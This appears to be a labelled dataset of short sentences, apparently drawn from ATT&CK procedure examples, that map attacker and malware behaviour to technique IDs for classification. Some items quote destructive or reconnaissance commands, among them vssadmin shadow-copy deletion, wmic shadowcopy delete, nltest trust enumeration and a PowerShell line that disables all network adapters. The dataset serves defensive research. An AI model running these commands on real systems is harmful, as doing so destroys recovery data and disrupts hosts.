{"text1":"During C0015, the threat actors used the command `nltest \/domain_trusts \/all_trusts` to enumerate domain trusts.","labels":"['T1482']"}
|
|
{"text1":"Earth Lusca has used Nltest to obtain information about domain controllers.","labels":"['T1482']"}
|
|
{"text1":"FIN8 has retrieved a list of trusted domains by using \"Nltest.exe \/domain_trusts\".","labels":"['T1482']"}
|
|
{"text1":"Nltest may be used to enumerate trusted domains by using commands such as \"nltest \/domain_trusts\".","labels":"['T1482']"}
|
|
{"text1":"PoshC2 has modules for enumerating domain trusts.","labels":"['T1482']"}
|
|
{"text1":"PowerSploit has modules such as \"Get-NetDomainTrust\" and \"Get-NetForestTrust\" to enumerate domain and forest trusts.","labels":"['T1482']"}
|
|
{"text1":"QakBot can run \"nltest \/domain_trusts \/all_trusts\" for domain trust discovery.","labels":"['T1482']"}
|
|
{"text1":"TrickBot can gather information about domain trusts by utilizing Nltest.","labels":"['T1482']"}
|
|
{"text1":"UNC2452 used the \"Get-AcceptedDomain\" PowerShell cmdlet to enumerate accepted domains through an Exchange Management Shell. They also used AdFind to enumerate domains and to discover trust between federated domains.","labels":"['T1482']"}
|
|
{"text1":"dsquery can be used to gather information on domain trusts with \"dsquery * -filter \"(objectClass=trustedDomain)\" -attr *\".","labels":"['T1482']"}
|
|
{"text1":"Empire can use \"New-GPOImmediateTask\" to modify a GPO that will install and execute a malicious Scheduled Task\/Job.","labels":"['T1484.001']"}
|
|
{"text1":"HermeticWiper has the ability to deploy through an infected system's default domain policy.","labels":"['T1484.001']"}
|
|
{"text1":"AADInternals can create a backdoor by converting a domain to a federated domain which will be able to authenticate any user across the tenant. AADInternals can also modify DesktopSSO information.","labels":"['T1484.002']"}
|
|
{"text1":"APT38 has used a custom secure delete function to make deleted files unrecoverable.","labels":"['T1485']"}
|
|
{"text1":"BlackEnergy 2 contains a \"Destroy\" plug-in that destroys data stored on victim hard drives by overwriting file contents.","labels":"['T1485']"}
|
|
{"text1":"CaddyWiper can work alphabetically through drives on a compromised system to take ownership of and overwrite all files.","labels":"['T1485']"}
|
|
{"text1":"HermeticWiper can recursively wipe folders and files in `Windows`, `Program Files`, `Program Files(x86)`, `PerfLogs`, `Boot, System`, `Volume Information`, and `AppData` folders using `FSCTL_MOVE_FILE`. HermeticWiper can also overwrite symbolic links and big files in `My Documents` and on the Desktop with random bytes.","labels":"['T1485']"}
|
|
{"text1":"Industroyer\u2019s data wiper module clears registry keys and overwrites both ICS configuration and Windows files.","labels":"['T1485']"}
|
|
{"text1":"Kazuar can overwrite files with random data before deleting them.","labels":"['T1485']"}
|
|
{"text1":"Meteor can fill a victim's files and directories with zero-bytes in replacement of real content before deleting them.","labels":"['T1485']"}
|
|
{"text1":"Olympic Destroyer overwrites files locally and on remote shares.","labels":"['T1485']"}
|
|
{"text1":"REvil has the capability to destroy files and folders.","labels":"['T1485']"}
|
|
{"text1":"RawDisk was used in Shamoon to write to protected system locations such as the MBR and disk partitions in an effort to destroy data.","labels":"['T1485']"}
|
|
{"text1":"Sandworm Team has used the BlackEnergy KillDisk component to overwrite files on Windows-based Human-Machine Interfaces.","labels":"['T1485']"}
|
|
{"text1":"Shamoon attempts to overwrite operating system files and disk structures with image files. In a later variant, randomly generated data was used for data overwrites.","labels":"['T1485']"}
|
|
{"text1":"APT38 has used Hermes ransomware to encrypt files with AES256.","labels":"['T1486']"}
|
|
{"text1":"Avaddon encrypts the victim system using a combination of AES256 and RSA encryption schemes.","labels":"['T1486']"}
|
|
{"text1":"BitPaymer can import a hard-coded RSA 1024-bit public key, generate a 128-bit RC4 key for each file, and encrypt the file in place, appending \".locked\" to the filename.","labels":"['T1486']"}
|
|
{"text1":"Clop can encrypt files using AES, RSA, and RC4 and will add the \".clop\" extension to encrypted files.","labels":"['T1486']"}
|
|
{"text1":"Conti can use \"CreateIoCompletionPort()\", \"PostQueuedCompletionStatus()\", and \"GetQueuedCompletionPort()\" to rapidly encrypt files, excluding those with the extensions of .exe, .dll, and .lnk. It has used a different AES-256 encryption key per file with a bundled RSA-4096 public encryption key that is unique for each victim. Conti can use \u201cWindows Restart Manager\u201d to ensure files are unlocked and open for encryption.","labels":"['T1486']"}
|
|
{"text1":"Cuba has the ability to encrypt system data and add the \".cuba\" extension to encrypted files.","labels":"['T1486']"}
|
|
{"text1":"DEATHRANSOM can use public and private key pair encryption to encrypt files for ransom payment.","labels":"['T1486']"}
|
|
{"text1":"Diavol has encrypted files using an RSA key through the `CryptEncrypt` API and has appended filenames with \".lock64\".","labels":"['T1486']"}
|
|
{"text1":"EKANS uses standard encryption library functions to encrypt files.","labels":"['T1486']"}
|
|
{"text1":"Egregor can encrypt all non-system files using a hybrid AES-RSA algorithm prior to displaying a ransom note.","labels":"['T1486']"}
|
|
{"text1":"HELLOKITTY can use an embedded RSA-2048 public key to encrypt victim data for ransom.","labels":"['T1486']"}
|
|
{"text1":"Indrik Spider has encrypted domain-controlled systems using BitPaymer.","labels":"['T1486']"}
|
|
{"text1":"JCry has encrypted files and demanded Bitcoin to decrypt those files.","labels":"['T1486']"}
|
|
{"text1":"LockerGoga has encrypted files, including core Windows OS files, using RSA-OAEP MGF1 and then demanded Bitcoin be paid for the decryption key.","labels":"['T1486']"}
|
|
{"text1":"Maze has disrupted systems by encrypting files on targeted machines, claiming to decrypt files if a ransom payment is made. Maze has used the ChaCha algorithm, based on Salsa20, and an RSA algorithm to encrypt files.","labels":"['T1486']"}
|
|
{"text1":"MegaCortex has used the open-source library, Mbed Crypto, and generated AES keys to carry out the file encryption process.","labels":"['T1486']"}
|
|
{"text1":"Netwalker can encrypt files on infected machines to extort victims.","labels":"['T1486']"}
|
|
{"text1":"Pay2Key can encrypt data on victims' machines using RSA and AES algorithms in order to extort a ransom payment for decryption.","labels":"['T1486']"}
|
|
{"text1":"REvil can encrypt files on victim systems and demands a ransom to decrypt the files.","labels":"['T1486']"}
|
|
{"text1":"RobbinHood will search for an RSA encryption key and then perform its encryption process on the system files.","labels":"['T1486']"}
|
|
{"text1":"Ryuk has used a combination of symmetric (AES) and asymmetric (RSA) encryption to encrypt files. Files have been encrypted with their own AES key and given a file extension of .RYK. Encrypted directories have had a ransom note of RyukReadMe.txt written to the directory.","labels":"['T1486']"}
|
|
{"text1":"SamSam encrypts victim files using RSA-2048 encryption and demands a ransom be paid in Bitcoin to decrypt those files.","labels":"['T1486']"}
|
|
{"text1":"Shamoon has an operational mode for encrypting data instead of overwriting it.","labels":"['T1486']"}
|
|
{"text1":"SynAck encrypts the victim's machine and then asks the victim to pay a ransom.","labels":"['T1486']"}
|
|
{"text1":"TA505 has used a wide variety of ransomware, such as Clop, Locky, Jaff, Bart, Philadelphia, and GlobeImposter, to encrypt victim files and demand a ransom payment.","labels":"['T1486']"}
|
|
{"text1":"ThiefQuest encrypts a set of file extensions on a host, deletes the original files, and provides a ransom note with no contact information.","labels":"['T1486']"}
|
|
{"text1":"WannaCry encrypts user files and demands that a ransom be paid in Bitcoin to decrypt those files.","labels":"['T1486']"}
|
|
{"text1":"XCSSET performs AES-CBC encryption on files under \"~\/Documents\", \"~\/Downloads\", and \"~\/Desktop\" with a fixed key and renames files to give them a \".enc\" extension. Only files with sizes less than 500MB are encrypted.","labels":"['T1486']"}
|
|
{"text1":"Xbash has maliciously encrypted victim's database systems and demanded a cryptocurrency ransom be paid.","labels":"['T1486']"}
|
|
{"text1":"Babuk can stop specific services related to backups.","labels":"['T1489']"}
|
|
{"text1":"Conti can stop up to 146 Windows services related to security, backup, database, and email solutions through the use of \"net stop\".","labels":"['T1489']"}
|
|
{"text1":"Diavol will terminate services using the Service Control Manager (SCM) API.","labels":"['T1489']"}
|
|
{"text1":"Indrik Spider has used PsExec to stop services prior to the execution of ransomware.","labels":"['T1489']"}
|
|
{"text1":"Industroyer\u2019s data wiper module writes zeros into the registry keys in \"SYSTEM\\CurrentControlSet\\Services\" to render a system inoperable.","labels":"['T1489']"}
|
|
{"text1":"Lazarus Group has stopped the MSExchangeIS service to render Exchange contents inaccessible to users.","labels":"['T1489']"}
|
|
{"text1":"LookBack can kill processes and delete services.","labels":"['T1489']"}
|
|
{"text1":"Maze has stopped SQL services to ensure it can encrypt any database.","labels":"['T1489']"}
|
|
{"text1":"MegaCortex can stop and disable services on the system.","labels":"['T1489']"}
|
|
{"text1":"Meteor can disconnect all network adapters on a compromised host using `powershell -Command \"Get-WmiObject -class Win32_NetworkAdapter | ForEach { If ($_.NetEnabled) { $_.Disable() } }\" > NUL`.","labels":"['T1489']"}
|
|
{"text1":"Netwalker can terminate system processes and services, some of which relate to backup software.","labels":"['T1489']"}
|
|
{"text1":"Olympic Destroyer uses the API call \"ChangeServiceConfigW\" to disable all services on the affected system.","labels":"['T1489']"}
|
|
{"text1":"Pay2Key can stop the MS SQL service at the end of the encryption process to release files locked by the service.","labels":"['T1489']"}
|
|
{"text1":"REvil has the capability to stop services and kill processes.","labels":"['T1489']"}
|
|
{"text1":"Ragnar Locker has attempted to stop services associated with business applications and databases to release the lock on files used by these applications so they may be encrypted.","labels":"['T1489']"}
|
|
{"text1":"RobbinHood stops 181 Windows services on the system before beginning the encryption process.","labels":"['T1489']"}
|
|
{"text1":"WannaCry attempts to kill processes associated with Exchange, Microsoft SQL Server, and MySQL to make it possible to encrypt their data stores.","labels":"['T1489']"}
|
|
{"text1":"Wizard Spider has used taskkill.exe and net.exe to stop backup, catalog, cloud, and other services prior to network encryption.","labels":"['T1489']"}
|
|
{"text1":"Avaddon deletes backups and shadow copies using native system tools.","labels":"['T1490']"}
|
|
{"text1":"Babuk has the ability to delete shadow volumes using \"vssadmin.exe delete shadows \/all \/quiet\".","labels":"['T1490']"}
|
|
{"text1":"Conti can delete Windows Volume Shadow Copies using \"vssadmin\".","labels":"['T1490']"}
|
|
{"text1":"DEATHRANSOM can delete volume shadow copies on compromised hosts.","labels":"['T1490']"}
|
|
{"text1":"DarkWatchman can delete shadow volumes using \"vssadmin.exe\".","labels":"['T1490']"}
|
|
{"text1":"EKANS removes backups of Volume Shadow Copies to disable any restoration capabilities.","labels":"['T1490']"}
|
|
{"text1":"HELLOKITTY can delete volume shadow copies on compromised hosts.","labels":"['T1490']"}
|
|
{"text1":"InvisiMole can remove all system restore points.","labels":"['T1490']"}
|
|
{"text1":"JCry has been observed deleting shadow copies to ensure that data cannot be restored easily.","labels":"['T1490']"}
|
|
{"text1":"Meteor can use `bcdedit` to delete different boot identifiers on a compromised host; it can also use `vssadmin.exe delete shadows \/all \/quiet` and `C:\\\\Windows\\\\system32\\\\wbem\\\\wmic.exe shadowcopy delete`.","labels":"['T1490']"}
|
|
{"text1":"Netwalker can delete the infected system's Shadow Volumes to prevent recovery.","labels":"['T1490']"}
|
|
{"text1":"ProLock can use vssadmin.exe to remove volume shadow copies.","labels":"['T1490']"}
|
|
{"text1":"Pysa has the functionality to delete shadow copies.","labels":"['T1490']"}
|
|
{"text1":"RobbinHood deletes shadow copies to ensure that all the data cannot be restored easily.","labels":"['T1490']"}
|
|
{"text1":"Ryuk has used \"vssadmin Delete Shadows \/all \/quiet\" to delete volume shadow copies and \"vssadmin resize shadowstorage\" to force deletion of shadow copies created by third-party applications.","labels":"['T1490']"}
|
|
{"text1":"WannaCry uses \"vssadmin\", \"wbadmin\", \"bcdedit\", and \"wmic\" to delete and disable operating system recovery features.","labels":"['T1490']"}
|
|
{"text1":"WastedLocker can delete shadow volumes.","labels":"['T1490']"}
|
|
{"text1":"After encryption, Diavol will capture the desktop background window, set the background color to black, and change the desktop wallpaper to a newly created bitmap image with the text \u201cAll your files are encrypted! For more information see \u201cREADME-FOR-DECRYPT.txt\".","labels":"['T1491.001']"}
|
|
{"text1":"Gamaredon Group has left taunting images and messages on the victims' desktops as proof of system access.","labels":"['T1491.001']"}
|
|
{"text1":"Sandworm Team defaced approximately 15,000 websites belonging to Georgian government, non-government, and private sector organizations in 2019.","labels":"['T1491.002']"}
|
|
{"text1":"Bad Rabbit has used an executable that installs a modified bootloader to prevent normal boot-up.","labels":"['T1495']"}
|
|
{"text1":"APT41 deployed a Monero cryptocurrency mining tool in a victim\u2019s environment.","labels":"['T1496']"}
|
|
{"text1":"CookieMiner has loaded coinmining software onto systems to mine for Koto cryptocurrency.","labels":"['T1496']"}
|
|
{"text1":"Hildegard has used xmrig to mine cryptocurrency.","labels":"['T1496']"}
|
|
{"text1":"Imminent Monitor has the capability to run a cryptocurrency miner on the victim machine.","labels":"['T1496']"}
|
|
{"text1":"Kinsing has created and run a Bitcoin cryptocurrency miner.","labels":"['T1496']"}
|
|
{"text1":"Lazarus Group has subset groups like Bluenoroff who have used cryptocurrency mining software on victim machines.","labels":"['T1496']"}
|
|
{"text1":"LoudMiner harvested system resources to mine cryptocurrency, using XMRig to mine Monero.","labels":"['T1496']"}
|
|
{"text1":"Lucifer can use system resources to mine cryptocurrency, dropping XMRig to mine Monero.","labels":"['T1496']"}
|
|
{"text1":"Rocke has distributed cryptomining malware.","labels":"['T1496']"}
|
|
{"text1":"Skidmap is a kernel-mode rootkit used for cryptocurrency mining.","labels":"['T1496']"}
|
|
{"text1":"TeamTNT has deployed XMRig Docker images to mine cryptocurrency. TeamTNT has also infected Docker containers and Kubernetes clusters with XMRig, and used RainbowMiner and lolMiner for mining cryptocurrency.","labels":"['T1496']"}
|
|
{"text1":"Agent Tesla has the ability to perform anti-sandboxing and anti-virtualization checks.","labels":"['T1497']"}
|
|
{"text1":"Bumblebee has the ability to perform anti-virtualization checks.","labels":"['T1497']"}
|
|
{"text1":"CHOPSTICK includes runtime checks to identify an analysis environment and prevent execution on it.","labels":"['T1497']"}
|
|
{"text1":"Carberp has removed various hooks before installing the trojan or bootkit to evade sandbox analysis or other analysis software.","labels":"['T1497']"}
|
|
{"text1":"Darkhotel malware has employed just-in-time decryption of strings to evade sandbox detection.","labels":"['T1497']"}
|
|
{"text1":"During Operation Spalax, the threat actors used droppers that would run anti-analysis checks before executing malware on a compromised host.","labels":"['T1497']"}
|
|
{"text1":"Gelsemium can use junk code to generate random activity to obscure malware behavior.","labels":"['T1497']"}
|
|
{"text1":"HAWKBALL has methods to check if the process the malware uses is being debugged.","labels":"['T1497']"}
|
|
{"text1":"Kevin can sleep for a time interval between C2 communication attempts.","labels":"['T1497']"}
|
|
{"text1":"Lucifer can crash a debugger by passing a format string to \"OutputDebugStringA()\".","labels":"['T1497']"}
|
|
{"text1":"Metamorfo has embedded a \"vmdetect.exe\" executable to identify virtual machines at the beginning of execution.","labels":"['T1497']"}
|
|
{"text1":"Pteranodon has the ability to use anti-detection functions to identify sandbox environments.","labels":"['T1497']"}
|
|
{"text1":"Some versions of CozyCar will check to ensure it is not being executed inside a virtual machine or a known malware analysis sandbox environment. If it detects that it is, it will exit.","labels":"['T1497']"}
|
|
{"text1":"The White Company has performed anti-analysis checks to determine if its malware was in a debugging environment.","labels":"['T1497']"}
|
|
{"text1":"Attor can detect whether it is executed in some virtualized or emulated environment by searching for specific artifacts, such as communication with I\/O ports and using VM-specific instructions.","labels":"['T1497.001']"}
|
|
{"text1":"BadPatch attempts to detect if it is being run in a Virtual Machine (VM) using a WMI query for disk drive name, BIOS, and motherboard information.","labels":"['T1497.001']"}
|
|
{"text1":"Bumblebee has the ability to search for designated file paths and Registry keys that indicate a virtualized environment from multiple products.","labels":"['T1497.001']"}
|
|
{"text1":"Darkhotel malware has used a series of checks to determine if it's being analyzed; checks include the length of executable names, if a filename ends with \".Md5.exe\", and if the program is executed from the root of the C:\\ drive, as well as checks for sandbox-related libraries.","labels":"['T1497.001']"}
|
|
{"text1":"Denis ran multiple system checks, looking for processor and register characteristics, to evade emulation and analysis.","labels":"['T1497.001']"}
|
|
{"text1":"During Frankenstein, the threat actors used a script that ran WMI queries to check if a VM or sandbox was running, including VMWare and Virtualbox. The script would also call WMI to determine the number of cores allocated to the system; if less than two the script would stop execution.","labels":"['T1497.001']"}
|
|
{"text1":"Dyre can detect sandbox analysis environments by inspecting the process list and Registry.","labels":"['T1497.001']"}
|
|
{"text1":"EvilBunny's dropper has checked the number of processes and the length and strings of its own file name to identify if the malware is in a sandbox environment.","labels":"['T1497.001']"}
|
|
{"text1":"Evilnum has used a component called TerraLoader to check certain hardware and file information to detect sandboxed environments.","labels":"['T1497.001']"}
|
|
{"text1":"Ferocious can run anti-sandbox checks using the Microsoft Excel 4.0 function \"GET.WORKSPACE\" to determine the OS version, if there is a mouse present, and if the host is capable of playing sounds.","labels":"['T1497.001']"}
|
|
{"text1":"FinFisher obtains the hardware device list and checks if the MD5 of the vendor ID is equal to a predefined list in order to check for sandbox\/virtualized environments.","labels":"['T1497.001']"}
|
|
{"text1":"Frankenstein has used WMI queries to check if various security applications were running, including VMWare and Virtualbox.","labels":"['T1497.001']"}
|
|
{"text1":"GoldMax will check if it is being run in a virtualized environment by comparing the collected MAC address to \"c8:27:cc:c2:37:5a\".","labels":"['T1497.001']"}
|
|
{"text1":"Grandoreiro can detect VMWare via its I\/O port and Virtual PC via the \"vpcext\" instruction.","labels":"['T1497.001']"}
|
|
{"text1":"GuLoader has the ability to perform anti-VM and anti-sandbox checks using string hashing, the API call \"EnumWindows\", and checking for Qemu guest agent.","labels":"['T1497.001']"}
|
|
{"text1":"InvisiMole can check for artifacts of VirtualBox, Virtual PC and VMware environment, and terminate itself if they are detected.","labels":"['T1497.001']"}
|
|
{"text1":"Lazarus Group has used tools to detect sandbox or VMware services through identifying the presence of a debugger or related services.","labels":"['T1497.001']"}
|
|
{"text1":"Lucifer can check for specific usernames, computer names, device drivers, DLLs, and virtual devices associated with sandboxed environments and can enter an infinite loop and stop itself if any are detected.","labels":"['T1497.001']"}
|
|
{"text1":"MegaCortex has checked the number of CPUs in the system to avoid being run in a sandbox or emulator.","labels":"['T1497.001']"}
|
|
{"text1":"NativeZone has checked if a VMware or VirtualBox VM is running on a compromised host.","labels":"['T1497.001']"}
|
|
{"text1":"OSX_OCEANLOTUS.D has variants that check a number of system parameters to see if it is being run on real hardware or in a virtual machine environment, such as \"sysctl hw.model\".","labels":"['T1497.001']"}
|
|
{"text1":"OilRig has used macros to verify if a mouse is connected to a compromised machine.","labels":"['T1497.001']"}
|
|
{"text1":"Okrum's loader can check the amount of physical memory and terminates itself if the host has less than 1.5 Gigabytes of physical memory in total.","labels":"['T1497.001']"}
|
|
{"text1":"PlugX checks if VMware tools is running in the background by searching for any process named \"vmtoolsd\".","labels":"['T1497.001']"}
|
|
{"text1":"PoetRAT checked the size of the hard drive to determine if it was being run in a sandbox environment. In the event of sandbox detection, it would delete itself by overwriting the malware scripts with the contents of \"License.txt\" and exiting.","labels":"['T1497.001']"}
|
|
{"text1":"Pupy has a module that checks a number of indicators on the system to determine if it's running on a virtual machine.","labels":"['T1497.001']"}
|
|
{"text1":"QakBot can check the compromised host for the presence of multiple executables associated with analysis tools and halt execution if any are found.","labels":"['T1497.001']"}
|
|
{"text1":"ROKRAT can check for VMware-related files and DLLs related to sandboxes.","labels":"['T1497.001']"}
|
|
{"text1":"Remcos searches for Sandboxie and VMware on the system.","labels":"['T1497.001']"}
|
|
{"text1":"Smoke Loader scans processes to perform anti-VM checks.","labels":"['T1497.001']"}
|
|
{"text1":"UBoatRAT checks for virtualization software such as VMWare, VirtualBox, or QEmu on the compromised machine.","labels":"['T1497.001']"}
|
|
{"text1":"WastedLocker checked if UCOMIEnumConnections and IActiveScriptParseProcedure32 Registry keys were detected as part of its anti-analysis technique.","labels":"['T1497.001']"}
|
|
{"text1":"WhisperGate can stop its execution when it recognizes the presence of certain monitoring tools.","labels":"['T1497.001']"}
|
|
{"text1":"macOS.OSAMiner can parse the output of the native `system_profiler` tool to determine if the machine is running with 4 cores.","labels":"['T1497.001']"}
|
|
{"text1":"yty has some basic anti-sandbox detection that tries to detect Virtual PC, Sandboxie, and VMware.","labels":"['T1497.001']"}
|
|
{"text1":"Darkhotel has used malware that repeatedly checks the mouse cursor position to determine if a real user is on the system.","labels":"['T1497.002']"}
|
|
{"text1":"FIN7 used images embedded into document lures that only activate the payload when a user double clicks to avoid sandboxes.","labels":"['T1497.002']"}
|
|
{"text1":"Okrum loader only executes the payload after the left mouse button has been pressed at least three times, in order to avoid being executed within virtualized or emulated environments.","labels":"['T1497.002']"}
|
|
{"text1":"After initial installation, Raindrop runs a computation to delay execution.","labels":"['T1497.003']"}
|
|
{"text1":"AppleJeus has waited a specified time before downloading a second stage payload.","labels":"['T1497.003']"}
|
|
{"text1":"BADFLICK has delayed communication to the actor-controlled IP address by 5 minutes.","labels":"['T1497.003']"}
|
|
{"text1":"Bazar can use a timer to delay execution of core functionality.","labels":"['T1497.003']"}
|
|
{"text1":"BendyBear can check for analysis environments and signs of debugging using the Windows API \"kernel32!GetTickCountKernel32\" call.","labels":"['T1497.003']"}
|
|
{"text1":"Bisonal has checked if the malware is running in a virtual environment with the anti-debug function GetTickCount() to compare the timing.","labels":"['T1497.003']"}
|
|
{"text1":"Clambling can wait 30 minutes before initiating contact with C2.","labels":"['T1497.003']"}
|
|
{"text1":"Crimson can determine when it has been installed on a host for at least 15 days before downloading the final payload.","labels":"['T1497.003']"}
|
|
{"text1":"Egregor can perform a long sleep (greater than or equal to 3 minutes) to evade detection.","labels":"['T1497.003']"}
|
|
{"text1":"FatDuke can turn itself on or off at random intervals.","labels":"['T1497.003']"}
|
|
{"text1":"GrimAgent can sleep for 195 - 205 seconds after payload execution and before deleting its task.","labels":"['T1497.003']"}
|
|
{"text1":"HermeticWiper has the ability to receive a command parameter to sleep prior to carrying out destructive actions on a targeted host.","labels":"['T1497.003']"}
|
|
{"text1":"LiteDuke can wait 30 seconds before executing additional code if security software is detected.","labels":"['T1497.003']"}
|
|
{"text1":"P8RAT has the ability to \"sleep\" for a specified time to evade detection.","labels":"['T1497.003']"}
|
|
{"text1":"Pony has delayed execution using a built-in function to avoid detection and analysis.","labels":"['T1497.003']"}
|
|
{"text1":"SUNBURST remained dormant after initial access for a period of up to two weeks.","labels":"['T1497.003']"}
|
|
{"text1":"Saint Bot has used the command `timeout 20` to pause the execution of its initial loader.","labels":"['T1497.003']"}
|
|
{"text1":"SodaMaster has the ability to put itself to \"sleep\" for a specified time.","labels":"['T1497.003']"}
|
|
{"text1":"The QakBot dropper can delay dropping the payload to evade detection.","labels":"['T1497.003']"}
|
|
{"text1":"ThiefQuest invokes a \"time\" call to check the system's time, executes a \"sleep\" command, invokes a second \"time\" call, and then compares the time difference between the two \"time\" calls with the amount of time the system slept to identify the sandbox.","labels":"['T1497.003']"}
|
|
{"text1":"TrickBot has used \"printf\" and file I\/O loops to delay process execution as part of API hammering.","labels":"['T1497.003']"}
|
|
{"text1":"Using the machine's local time, XCSSET waits 43200 seconds (12 hours) from the initial creation timestamp of a specific file, \".report\". After the elapsed time, XCSSET executes additional modules.","labels":"['T1497.003']"}
|
|
{"text1":"WhisperGate can pause for 20 seconds to bypass antivirus solutions.","labels":"['T1497.003']"}
|
|
{"text1":"OnionDuke has the capability to use a Denial of Service module.","labels":"['T1499']"}
|
|
{"text1":"Sandworm Team temporarily disrupted service to Georgian government, non-government, and private sector websites after compromising a Georgian web hosting provider in 2019.","labels":"['T1499']"}
|
|
{"text1":"ZxShell has a feature to perform SYN flood attack on a host.","labels":"['T1499']"}
|
|
{"text1":"Industroyer uses a custom DoS tool that leverages CVE-2015-5374 and targets hardcoded IP addresses of Siemens SIPROTEC devices.","labels":"['T1499.004']"}
|
|
{"text1":"Sandworm Team has used various MS-SQL stored procedures.","labels":"['T1505.001']"}
|
|
{"text1":"Stuxnet used xp_cmdshell to store and execute SQL code.","labels":"['T1505.001']"}
|
|
{"text1":"LightNeuron has used a malicious Microsoft Exchange transport agent for persistence.","labels":"['T1505.002']"}
|
|
{"text1":"APT28 has used a modified and obfuscated version of the reGeorg web shell to maintain persistence on a target's Outlook Web Access (OWA) server.","labels":"['T1505.003']"}
|
|
{"text1":"APT29 has installed web shells on exploited Microsoft Exchange servers.","labels":"['T1505.003']"}
|
|
{"text1":"APT32 has used Web shells to maintain access to victim websites.","labels":"['T1505.003']"}
|
|
{"text1":"APT38 has used web shells for persistence or to ensure redundant access.","labels":"['T1505.003']"}
|
|
{"text1":"APT39 has installed ANTAK and ASPXSPY web shells.","labels":"['T1505.003']"}
|
|
{"text1":"ASPXSpy is a Web shell. The ASPXTool version used by Threat Group-3390 has been deployed to accessible servers running Internet Information Services (IIS).","labels":"['T1505.003']"}
|
|
{"text1":"BackdoorDiplomacy has used web shells to establish an initial foothold and for lateral movement within a victim's system.","labels":"['T1505.003']"}
|
|
{"text1":"China Chopper's server component is a Web Shell payload.","labels":"['T1505.003']"}
|
|
{"text1":"Dragonfly has commonly created Web shells on victims' publicly accessible email and web servers, which they used to maintain access to a victim network and download additional malicious files.","labels":"['T1505.003']"}
|
|
{"text1":"During Operation Wocao, threat actors used their own web shells, as well as those previously placed on target systems by other threat actors, for reconnaissance and lateral movement.","labels":"['T1505.003']"}
|
|
{"text1":"GALLIUM used Web shells to persist in victim environments and assist in execution and exfiltration.","labels":"['T1505.003']"}
|
|
{"text1":"HAFNIUM has deployed multiple web shells on compromised servers including SIMPLESEESHARP, SPORTSBALL, China Chopper, and ASPXSpy.","labels":"['T1505.003']"}
|
|
{"text1":"Kimsuky has used modified versions of open source PHP web shells to maintain access, often adding \"Dinosaur\" references within the code.","labels":"['T1505.003']"}
|
|
{"text1":"Leviathan relies on web shells for an initial foothold as well as persistence into the victim's systems.","labels":"['T1505.003']"}
|
|
{"text1":"Moses Staff has dropped a web shell onto a compromised system.","labels":"['T1505.003']"}
|
|
{"text1":"OilRig has used web shells, often to maintain access to a victim network.","labels":"['T1505.003']"}
|
|
{"text1":"OwaAuth is a Web shell that appears to be exclusively used by Threat Group-3390. It is installed as an ISAPI filter on Exchange servers and shares characteristics with the China Chopper Web shell.","labels":"['T1505.003']"}
|
|
{"text1":"P.A.S. Webshell can gain remote access and execution on target web servers.","labels":"['T1505.003']"}
|
|
{"text1":"SUPERNOVA is a Web shell.","labels":"['T1505.003']"}
|
|
{"text1":"Sandworm Team has used webshells including P.A.S. Webshell to maintain access to victim networks.","labels":"['T1505.003']"}
|
|
{"text1":"TEMP.Veles has planted Web shells on Outlook Exchange servers.","labels":"['T1505.003']"}
|
|
{"text1":"Threat Group-3390 has used a variety of Web shells.","labels":"['T1505.003']"}
|
|
{"text1":"Tonto Team has used a first stage web shell after compromising a vulnerable Exchange server.","labels":"['T1505.003']"}
|
|
{"text1":"Tropic Trooper has started a web service on the target host and waits for the adversary to connect, acting as a web shell.","labels":"['T1505.003']"}
|
|
{"text1":"IceApple is an IIS post-exploitation framework, consisting of 18 modules that provide several functionalities.","labels":"['T1505.004']"}
|
|
{"text1":"RGDoor establishes persistence on webservers as an IIS module.","labels":"['T1505.004']"}
|
|
{"text1":"Bazar can query the Registry for installed applications.","labels":"['T1518']"}
|
|
{"text1":"CharmPower can list the installed applications on a compromised host.","labels":"['T1518']"}
|
|
{"text1":"ComRAT can check the victim's default browser to determine which process to inject its communications module into.","labels":"['T1518']"}
|
|
{"text1":"Dridex has collected a list of installed software on the system.","labels":"['T1518']"}
|
|
{"text1":"During Operation Dust Storm, the threat actors deployed a file called `DeployJava.js` to fingerprint installed software on a victim system prior to exploit delivery.","labels":"['T1518']"}
|
|
{"text1":"During Operation Wocao, threat actors collected a list of installed software on the infected system.","labels":"['T1518']"}
|
|
{"text1":"HEXANE has enumerated programs installed on an infected machine.","labels":"['T1518']"}
|
|
{"text1":"HotCroissant can retrieve a list of applications from the \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\" registry key.","labels":"['T1518']"}
|
|
{"text1":"Inception has enumerated installed software on compromised systems.","labels":"['T1518']"}
|
|
{"text1":"InvisiMole can collect information about installed software used by specific users, software executed on user login, and software executed by each system.","labels":"['T1518']"}
|
|
{"text1":"KGH_SPY can collect information on installed applications.","labels":"['T1518']"}
|
|
{"text1":"MarkiRAT can check for the Telegram installation directory by enumerating the files on disk.","labels":"['T1518']"}
|
|
{"text1":"Metamorfo has searched the compromised system for banking applications.","labels":"['T1518']"}
|
|
{"text1":"MuddyWater has used a PowerShell backdoor to check for Skype connectivity on the target machine.","labels":"['T1518']"}
|
|
{"text1":"P.A.S. Webshell can list PHP server configuration details.","labels":"['T1518']"}
|
|
{"text1":"QakBot can enumerate a list of installed programs.","labels":"['T1518']"}
|
|
{"text1":"RTM can scan victim drives to look for specific banking software on the machine to determine next actions.","labels":"['T1518']"}
|
|
{"text1":"SUGARDUMP can identify Chrome, Opera, Edge Chromium, and Firefox browsers, including version number, on a compromised host.","labels":"['T1518']"}
|
|
{"text1":"Siloscape searches for the kubectl binary.","labels":"['T1518']"}
|
|
{"text1":"TajMahal has the ability to identify the Internet Explorer (IE) version on an infected host.","labels":"['T1518']"}
|
|
{"text1":"The Cobalt Strike System Profiler can discover applications through the browser and identify the version of Java the target has.","labels":"['T1518']"}
|
|
{"text1":"Tropic Trooper's backdoor could list the infected system's installed software.","labels":"['T1518']"}
|
|
{"text1":"Windigo has used a script to detect installed software on targeted systems.","labels":"['T1518']"}
|
|
{"text1":"Windshift has used malware to identify installed software.","labels":"['T1518']"}
|
|
{"text1":"XCSSET uses \"ps aux\" with the \"grep\" command to enumerate common browsers and system processes potentially impacting XCSSET's exfiltration capabilities.","labels":"['T1518']"}
|
|
{"text1":"down_new has the ability to gather information on installed applications.","labels":"['T1518']"}
|
|
{"text1":"ABK has the ability to identify the installed anti-virus product on the compromised host.","labels":"['T1518.001']"}
|
|
{"text1":"APT38 has identified security software, configurations, defensive tools, and sensors installed on a compromised system.","labels":"['T1518.001']"}
|
|
